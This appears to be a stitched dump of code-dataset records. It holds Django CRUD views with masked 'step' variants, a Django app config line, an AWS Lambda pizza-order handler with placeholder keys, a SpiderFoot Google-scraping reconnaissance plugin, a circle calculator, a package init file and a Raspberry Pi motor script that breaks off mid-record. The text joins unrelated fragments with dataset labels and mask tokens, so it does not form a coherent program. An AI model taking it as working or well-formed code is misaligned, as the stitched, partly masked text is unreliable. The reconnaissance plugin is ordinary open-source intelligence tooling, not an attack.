    queryset = Entry.objects.order_by("-date_created")
class EntryDetailView(DetailView):
    # Render a single Entry, looked up by the pk captured from the URL.
    model = Entry
class EntryCreateView(CreateView):
    # Form view for creating an Entry; only these fields are user-editable.
    model = Entry
    fields = ["title", "content"]
    # After a successful save, return to the listing page.
    success_url = reverse_lazy("entry-list")
class EntryUpdateView(UpdateView):
    # Form view for editing an existing Entry.
    model = Entry
    fields = ["title", "content"]

    def get_success_url(self):
        # Redirect back to the detail page of the entry just edited.
        # UpdateView stores the saved instance on ``self.object``;
        # the original ``self.entry`` attribute does not exist and
        # raised AttributeError after every successful update.
        return reverse_lazy("entry-detail", kwargs={"pk": self.object.pk})
class EntryDeleteView(DeleteView):
    """Delete an Entry after confirmation, then return to the list view."""
    model = Entry
    success_url = reverse_lazy("entry-list")
|
normal
|
{
"blob_id": "37c03732ae52171fc24aec85c940848b02d76dc1",
"index": 1176,
"step-1": "<mask token>\n\n\nclass EntryCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-2": "<mask token>\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = ['title', 'content']\n success_url = reverse_lazy('entry-list')\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-3": "<mask token>\n\n\nclass EntryListView(ListView):\n <mask token>\n <mask token>\n\n\nclass EntryDetailView(DetailView):\n model = Entry\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = ['title', 'content']\n success_url = reverse_lazy('entry-list')\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-4": "<mask token>\n\n\nclass EntryListView(ListView):\n model = Entry\n queryset = Entry.objects.all().order_by('-date_created')\n\n\nclass EntryDetailView(DetailView):\n model = Entry\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = ['title', 'content']\n success_url = reverse_lazy('entry-list')\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-5": "from django.urls import reverse_lazy\nfrom django.views.generic import (\n ListView,\n DetailView,\n CreateView,\n UpdateView,\n DeleteView,\n)\n\nfrom .models import Entry\n\n\nclass EntryListView(ListView):\n model = Entry\n queryset = Entry.objects.all().order_by(\"-date_created\")\n\n\nclass EntryDetailView(DetailView):\n model = Entry\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = [\"title\", \"content\"]\n success_url = reverse_lazy(\"entry-list\")\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = [\"title\", \"content\"]\n\n def get_success_url(self):\n return reverse_lazy(\"entry-detail\", kwargs={\"pk\": self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy(\"entry-list\")\n",
"step-ids": [
6,
7,
10,
11,
13
]
}
|
[
6,
7,
10,
11,
13
] |
# Legacy pointer to this app's AppConfig class.  Implicit AppConfig
# discovery makes this unnecessary (and deprecated) from Django 3.2 on.
default_app_config = 'reman.apps.RemanConfig'
|
normal
|
{
"blob_id": "0b0b928aef9a4e9953b02639bf5e7769cc4389d7",
"index": 2488,
"step-1": "<mask token>\n",
"step-2": "default_app_config = 'reman.apps.RemanConfig'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2',
aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(Key={'menu_id': menu_id})
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index += 1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = 'Hi ' + body['customer_name'
] + ', please choose one of these selection: ' + all_items
return {'message': message}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2',
aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(Key={'menu_id': menu_id})
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index += 1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = 'Hi ' + body['customer_name'
] + ', please choose one of these selection: ' + all_items
return {'message': message}
<|reserved_special_token_1|>
from __future__ import print_function
import boto3
import json
import decimal
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2',
aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(Key={'menu_id': menu_id})
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index += 1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = 'Hi ' + body['customer_name'
] + ', please choose one of these selection: ' + all_items
return {'message': message}
<|reserved_special_token_1|>
from __future__ import print_function # Python 2/3 compatibility
import boto3
import json
import decimal
# Placeholder credentials.  NOTE(review): never commit real keys — prefer
# the Lambda execution role (boto3.resource('dynamodb') with no explicit
# keys) so no static credentials live in the source.
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
    """Store an incoming pizza order and prompt the customer with the menu.

    Parameters
    ----------
    event : dict
        API Gateway payload; ``event['body-json']`` must contain the order
        item, including at least ``menu_id`` and ``customer_name``.
    context : object
        Lambda context object (unused).

    Returns
    -------
    dict
        ``{"message": ...}`` asking the customer to choose a menu item.
    """
    # NOTE(review): static credentials come from module constants; prefer
    # the Lambda execution role so no keys need to be embedded.
    dynamodb = boto3.resource('dynamodb', region_name='us-west-2',
                              aws_access_key_id=AWS_KEY,
                              aws_secret_access_key=AWS_SECRET)

    # Persist the raw order as-is.
    body = event['body-json']
    dynamodb.Table('orders').put_item(Item=body)

    # Look up the menu the order refers to.
    menu = dynamodb.Table('pizzashop').get_item(Key={'menu_id': body['menu_id']})
    selection = menu['Item']['selection']

    # Build "1. item,2. item,..." — numbered, comma-separated, no trailing
    # comma (the original appended commas then sliced the last one off).
    all_items = ','.join('%d. %s' % (i, item)
                         for i, item in enumerate(selection, 1))

    message = "Hi " + body['customer_name'] + ', please choose one of these selection: ' + all_items
    return {"message": message}
|
flexible
|
{
"blob_id": "511ea9eb1dc234a488c19f9ee9fbd40f81955d54",
"index": 5172,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2',\n aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n body = event['body-json']\n response = table.put_item(Item=body)\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(Key={'menu_id': menu_id})\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index += 1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n message = 'Hi ' + body['customer_name'\n ] + ', please choose one of these selection: ' + all_items\n return {'message': message}\n",
"step-3": "<mask token>\nAWS_KEY = '****'\nAWS_SECRET = '****'\n\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2',\n aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n body = event['body-json']\n response = table.put_item(Item=body)\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(Key={'menu_id': menu_id})\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index += 1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n message = 'Hi ' + body['customer_name'\n ] + ', please choose one of these selection: ' + all_items\n return {'message': message}\n",
"step-4": "from __future__ import print_function\nimport boto3\nimport json\nimport decimal\nAWS_KEY = '****'\nAWS_SECRET = '****'\n\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2',\n aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n body = event['body-json']\n response = table.put_item(Item=body)\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(Key={'menu_id': menu_id})\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index += 1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n message = 'Hi ' + body['customer_name'\n ] + ', please choose one of these selection: ' + all_items\n return {'message': message}\n",
"step-5": "from __future__ import print_function # Python 2/3 compatibility\nimport boto3\nimport json\nimport decimal\n\nAWS_KEY = '****'\nAWS_SECRET = '****'\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2', aws_access_key_id=AWS_KEY , aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n\n body = event['body-json']\n response = table.put_item(Item=body)\n\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(\n Key={\n 'menu_id': menu_id,\n }\n )\n\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index +=1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n\n\n message = \"Hi \" + body['customer_name'] + ', please choose one of these selection: ' + all_items\n return {\"message\" : message}\n #return menu\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sfp_googlesearch
# Purpose: Searches Google for content related to the domain in question.
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 07/05/2012
# Copyright: (c) Steve Micallef 2012
# Licence: GPL
# -------------------------------------------------------------------------------
from sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent
class sfp_googlesearch(SpiderFootPlugin):
    """Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links."""

    # Default options; individual keys may be overridden via setup().
    opts = {
        'fetchlinks': True,  # Should we fetch links on the base domain?
        'pages': 20  # Number of Google results pages to iterate
    }

    # Human-readable descriptions of the options above (shown in the UI).
    optdescs = {
        'fetchlinks': "Fetch links found on the target domain-name?",
        'pages': "Number of Google results pages to iterate through."
    }

    # Targets, pages and links already processed, to avoid duplicate work.
    results = list()

    def setup(self, sfc, userOpts=None):
        """Store the SpiderFoot context and merge user-supplied options.

        ``userOpts`` defaults to None instead of a mutable ``dict()`` so a
        shared default is never mutated across calls.  Note that
        ``self.opts`` is the class-level dict, so option updates are shared
        across instances — this mirrors the framework's existing behaviour.
        """
        self.sf = sfc
        self.results = list()

        if userOpts:
            for opt in userOpts.keys():
                self.opts[opt] = userOpts[opt]

    def watchedEvents(self):
        """Events this module consumes as input."""
        return ["INTERNET_NAME"]

    def producedEvents(self):
        """Events this module can emit; supports module selection by event."""
        return ["LINKED_URL_INTERNAL", "SEARCH_ENGINE_WEB_CONTENT"]

    def handleEvent(self, event):
        """Search Google for pages on the target domain and emit results."""
        eventData = event.data

        if eventData in self.results:
            self.sf.debug("Already did a search for " + eventData + ", skipping.")
            return None
        self.results.append(eventData)

        # Sites hosted on the domain.
        pages = self.sf.googleIterate("site:" + eventData,
                                      dict(limit=self.opts['pages'], useragent=self.opts['_useragent'],
                                           timeout=self.opts['_fetchtimeout']))
        if pages is None:
            self.sf.info("No results returned from Google.")
            return None

        for page in pages.keys():
            if page in self.results:
                continue
            self.results.append(page)

            # Check if we've been asked to stop.
            if self.checkForStop():
                return None

            # Submit the Google results for analysis.
            evt = SpiderFootEvent("SEARCH_ENGINE_WEB_CONTENT", pages[page],
                                  self.__name__, event)
            self.notifyListeners(evt)

            # Optionally fetch links to our domain found in the search
            # results; these may not have been identified through spidering.
            if self.opts['fetchlinks']:
                links = self.sf.parseLinks(page, pages[page], eventData)
                if len(links) == 0:
                    continue

                for link in links:
                    if link in self.results:
                        continue
                    self.results.append(link)
                    self.sf.debug("Found a link: " + link)
                    if self.sf.urlFQDN(link).endswith(eventData):
                        if self.checkForStop():
                            return None

                        evt = SpiderFootEvent("LINKED_URL_INTERNAL", link,
                                              self.__name__, event)
                        self.notifyListeners(evt)

# End of sfp_googlesearch class
|
normal
|
{
"blob_id": "3a6eaa238e78e7a818bcf6e18cc7881eadf94b07",
"index": 7863,
"step-1": "<mask token>\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-2": "<mask token>\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.results = list()\n for opt in userOpts.keys():\n self.opts[opt] = userOpts[opt]\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-3": "<mask token>\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n \"\"\"Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links.\"\"\"\n opts = {'fetchlinks': True, 'pages': 20}\n optdescs = {'fetchlinks':\n 'Fetch links found on the target domain-name?', 'pages':\n 'Number of Google results pages to iterate through.'}\n results = list()\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.results = list()\n for opt in userOpts.keys():\n self.opts[opt] = userOpts[opt]\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-4": "from sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n \"\"\"Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links.\"\"\"\n opts = {'fetchlinks': True, 'pages': 20}\n optdescs = {'fetchlinks':\n 'Fetch links found on the target domain-name?', 'pages':\n 'Number of Google results pages to iterate through.'}\n results = list()\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.results = list()\n for opt in userOpts.keys():\n self.opts[opt] = userOpts[opt]\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-5": "# -*- coding: utf-8 -*-\r\n# -------------------------------------------------------------------------------\r\n# Name: sfp_googlesearch\r\n# Purpose: Searches Google for content related to the domain in question.\r\n#\r\n# Author: Steve Micallef <steve@binarypool.com>\r\n#\r\n# Created: 07/05/2012\r\n# Copyright: (c) Steve Micallef 2012\r\n# Licence: GPL\r\n# -------------------------------------------------------------------------------\r\n\r\nfrom sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent\r\n\r\n\r\nclass sfp_googlesearch(SpiderFootPlugin):\r\n \"\"\"Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links.\"\"\"\r\n\r\n # Default options\r\n opts = {\r\n 'fetchlinks': True, # Should we fetch links on the base domain?\r\n 'pages': 20 # Number of google results pages to iterate\r\n }\r\n\r\n # Option descriptions\r\n optdescs = {\r\n 'fetchlinks': \"Fetch links found on the target domain-name?\",\r\n 'pages': \"Number of Google results pages to iterate through.\"\r\n }\r\n\r\n # Target\r\n results = list()\r\n\r\n def setup(self, sfc, userOpts=dict()):\r\n self.sf = sfc\r\n self.results = list()\r\n\r\n for opt in userOpts.keys():\r\n self.opts[opt] = userOpts[opt]\r\n\r\n # What events is this module interested in for input\r\n def watchedEvents(self):\r\n return [\"INTERNET_NAME\"]\r\n\r\n # What events this module produces\r\n # This is to support the end user in selecting modules based on events\r\n # produced.\r\n def producedEvents(self):\r\n return [\"LINKED_URL_INTERNAL\", \"SEARCH_ENGINE_WEB_CONTENT\"]\r\n\r\n def handleEvent(self, event):\r\n eventName = event.eventType\r\n srcModuleName = event.module\r\n eventData = event.data\r\n\r\n if eventData in self.results:\r\n self.sf.debug(\"Already did a search for \" + eventData + \", skipping.\")\r\n return None\r\n else:\r\n self.results.append(eventData)\r\n\r\n # Sites hosted on the domain\r\n pages = self.sf.googleIterate(\"site:\" + 
eventData,\r\n dict(limit=self.opts['pages'], useragent=self.opts['_useragent'],\r\n timeout=self.opts['_fetchtimeout']))\r\n if pages is None:\r\n self.sf.info(\"No results returned from Google.\")\r\n return None\r\n\r\n for page in pages.keys():\r\n if page in self.results:\r\n continue\r\n else:\r\n self.results.append(page)\r\n\r\n # Check if we've been asked to stop\r\n if self.checkForStop():\r\n return None\r\n\r\n # Submit the google results for analysis\r\n evt = SpiderFootEvent(\"SEARCH_ENGINE_WEB_CONTENT\", pages[page],\r\n self.__name__, event)\r\n self.notifyListeners(evt)\r\n\r\n # We can optionally fetch links to our domain found in the search\r\n # results. These may not have been identified through spidering.\r\n if self.opts['fetchlinks']:\r\n links = self.sf.parseLinks(page, pages[page], eventData)\r\n if len(links) == 0:\r\n continue\r\n\r\n for link in links:\r\n if link in self.results:\r\n continue\r\n else:\r\n self.results.append(link)\r\n self.sf.debug(\"Found a link: \" + link)\r\n if self.sf.urlFQDN(link).endswith(eventData):\r\n if self.checkForStop():\r\n return None\r\n\r\n evt = SpiderFootEvent(\"LINKED_URL_INTERNAL\", link,\r\n self.__name__, event)\r\n self.notifyListeners(evt)\r\n\r\n# End of sfp_googlesearch class\r\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
# Read a radius from the user and report the circle's basic measurements.
r = int(input("enter the value for the radius of the cycle: "))

pi = 3.14159
c = 2 * pi * r   # circumference = 2*pi*r
d = r * 2        # diameter
a = pi * r * r   # area = pi*r^2

print('circumference is ', c)
print('diameter is: ', d)
print('area is ', a)
|
normal
|
{
"blob_id": "ab5412a3d22bd53a592c93bad4870b06fd9f0720",
"index": 4080,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('circumference is ', circumference)\nprint('diameter is: ', diameter)\nprint('area is ', area)\n",
"step-3": "radius = int(input('enter the value for the radius of the cycle: '))\ncircumference = 2 * 3.14159 * radius\ndiameter = 2 * radius\narea = 3.14159 * radius ** 2\nprint('circumference is ', circumference)\nprint('diameter is: ', diameter)\nprint('area is ', area)\n",
"step-4": "radius = int(input(\"enter the value for the radius of the cycle: \"))\ncircumference = 2 * 3.14159 * radius\ndiameter = 2 * radius\narea = 3.14159 * radius ** 2\n\nprint('circumference is ', circumference)\nprint('diameter is: ', diameter)\nprint('area is ', area)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__all__ = ['PiGear', 'CamGear', 'VideoGear']
<|reserved_special_token_1|>
from .pigear import PiGear
from .camgear import CamGear
from .videogear import VideoGear
__all__ = ['PiGear', 'CamGear', 'VideoGear']
<|reserved_special_token_1|>
# Re-export the video-capture gear classes from their submodules.
from .pigear import PiGear
from .camgear import CamGear
from .videogear import VideoGear
# Public API of this package: exactly the three gear classes above.
__all__ = ["PiGear", "CamGear", "VideoGear"]
|
flexible
|
{
"blob_id": "3431e342c940b0d91f817c3e583728e55e305210",
"index": 8940,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['PiGear', 'CamGear', 'VideoGear']\n",
"step-3": "from .pigear import PiGear\nfrom .camgear import CamGear\nfrom .videogear import VideoGear\n__all__ = ['PiGear', 'CamGear', 'VideoGear']\n",
"step-4": "# import the necessary packages\nfrom .pigear import PiGear\nfrom .camgear import CamGear\nfrom .videogear import VideoGear\n\n__all__ = [\"PiGear\", \"CamGear\", \"VideoGear\"]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python3
import RPi.GPIO as GPIO
import time
# motor_EN_A: Pin7 | motor_EN_B: Pin11
# motor_A: Pin8,Pin10 | motor_B: Pin13,Pin12
#Motor_A_EN = 7
Motor_B_EN = 11  # motor B enable/PWM pin (physical/BOARD numbering)
#Motor_A_Pin1 = 8
#Motor_A_Pin2 = 10
Motor_B_Pin1 = 13  # motor B direction pin 1
Motor_B_Pin2 = 12  # motor B direction pin 2
Dir_forward = 0  # direction code: forward
Dir_backward = 1  # direction code: backward
#pwm_A = 0
pwm_B = 0  # replaced with a GPIO.PWM instance by setup()
def setup():
    """Initialise GPIO (BOARD numbering) and the PWM driver for motor B.

    Motor A wiring is intentionally unused in this build; only motor B
    (enable pin 11, direction pins 13/12) is configured.  Must be called
    before motorStart()/motorStop().
    """
    global pwm_B
    GPIO.setwarnings(False)
    GPIO.setmode(GPIO.BOARD)
    GPIO.setup(Motor_B_EN, GPIO.OUT)
    GPIO.setup(Motor_B_Pin1, GPIO.OUT)
    GPIO.setup(Motor_B_Pin2, GPIO.OUT)
    # 1 kHz PWM on the enable pin; the duty cycle is set in motorStart().
    pwm_B = GPIO.PWM(Motor_B_EN, 1000)
def motorStop():
    """Stop motor B by driving both direction pins and the enable pin low."""
    #GPIO.output(Motor_A_Pin1, GPIO.LOW)
    #GPIO.output(Motor_A_Pin2, GPIO.LOW)
    GPIO.output(Motor_B_Pin1, GPIO.LOW)
    GPIO.output(Motor_B_Pin2, GPIO.LOW)
    #GPIO.output(Motor_A_EN, GPIO.LOW)
    GPIO.output(Motor_B_EN, GPIO.LOW)
def motorStart(status, direction, speed):
    """Drive motor B.

    Parameters
    ----------
    status : int
        0 stops the motor; any other value runs it.
    direction : int
        Dir_forward (0) or Dir_backward (1); any other value is ignored.
    speed : float
        PWM duty cycle, 0-100.
    """
    global pwm_B
    if status == 0:  # stop requested
        motorStop()
        return
    if direction == Dir_forward:
        GPIO.output(Motor_B_Pin1, GPIO.HIGH)
        GPIO.output(Motor_B_Pin2, GPIO.LOW)
    elif direction == Dir_backward:
        GPIO.output(Motor_B_Pin1, GPIO.LOW)
        GPIO.output(Motor_B_Pin2, GPIO.HIGH)
    else:
        return  # unknown direction: leave pins untouched
    # Start the PWM at the requested duty cycle.  The original started the
    # forward case at 100% (and backward at 0%) before ChangeDutyCycle,
    # giving a brief full-power jolt when driving forward.
    pwm_B.start(speed)
    pwm_B.ChangeDutyCycle(speed)
def destroy():
    """Stop the motor and release all GPIO resources."""
    motorStop()
    GPIO.cleanup() # Release resource
# Script entry scaffold: the try body is a placeholder (no main loop yet);
# destroy() tears down motor/GPIO state if the user interrupts with Ctrl+C.
try:
    pass
except KeyboardInterrupt:
    destroy()
|
normal
|
{
"blob_id": "7369d5a463b0f41c17d5648739d4730256e611f9",
"index": 9612,
"step-1": "<mask token>\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\n<mask token>\n",
